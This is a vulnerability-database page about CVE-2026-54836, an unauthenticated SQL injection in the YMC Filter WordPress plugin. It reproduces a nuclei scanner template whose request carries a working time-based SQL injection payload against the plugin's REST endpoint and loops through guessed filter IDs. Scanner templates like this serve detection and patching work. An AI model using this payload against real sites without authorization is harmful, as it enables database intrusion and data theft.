Lucene search
+L

YMC Filter - SQL Injection

🗓️ 23 Jul 2026 03:49:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 2 Views

YMC Filter up to 3.11.5 has a SQL injection due to improper input handling, enabling arbitrary SQL.

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-54836
25 Jun 202613:17
attackerkb
Circl
CVE-2026-54836
25 Jun 202615:24
circl
CVE
CVE-2026-54836
25 Jun 202613:17
cve
Cvelist
CVE-2026-54836 WordPress Filter & Grids plugin <= 3.11.5 - SQL Injection vulnerability
25 Jun 202613:17
cvelist
EUVD
EUVD-2026-39389
25 Jun 202613:17
euvd
NVD
CVE-2026-54836
25 Jun 202614:16
nvd
Patchstack
WordPress Filter & Grids plugin <= 3.11.5 - SQL Injection vulnerability
18 Jun 202609:38
patchstack
Positive Technologies
PT-2026-52416
25 Jun 202600:00
ptsecurity
Vulnrichment
CVE-2026-54836 WordPress Filter & Grids plugin <= 3.11.5 - SQL Injection vulnerability
25 Jun 202613:17
vulnrichment
id: CVE-2026-54836

info:
  name: YMC Filter - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    YMC Filter <= 3.11.5 contains an sql injection caused by improper neutralization of special elements in SQL commands, letting attackers execute arbitrary SQL queries, exploit requires crafted input.
  impact: |
    Attackers can execute arbitrary SQL commands, potentially leading to data disclosure, modification, or deletion.
  remediation: |
    Update to the latest version beyond 3.11.5.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-54836
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2026-54836
    epss-score: 0.00789
    epss-percentile: 0.52421
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2026,wordpress,wp-plugin,sqli,ymc-smart-filter,unauth

http:
  - raw:
      - |
        @timeout: 20s
        POST /wp-json/ymc/v1/posts/filter HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"params":{"filter_id":{{fid}},"search":"xyznotexist999') OR (SELECT 1 FROM (SELECT SLEEP(7))x)))-- -","post_types":["post"],"paged":1}}

    payloads:
      fid:
        - "1"
        - "2"
        - "3"
        - "10"
        - "50"
        - "100"
        - "150"
        - "152"
        - "200"
        - "250"
        - "300"
        - "500"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'
          - 'status_code == 200'
          - 'contains(body, "\"success\":true")'
        condition: and
# digest: 4a0a0047304502200c62d47f176f3b95d26746618e19f5de12753871d900d91512b7f8e0f4afb518022100ed462d113aa0b9b94f18530bb837add62d415fa4183bbafc693bfc12d93934b5:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Jul 2026 05:26Current
6Medium risk
Vulners AI Score6
CVSS 3.19.3
EPSS0.00789
SSVC
2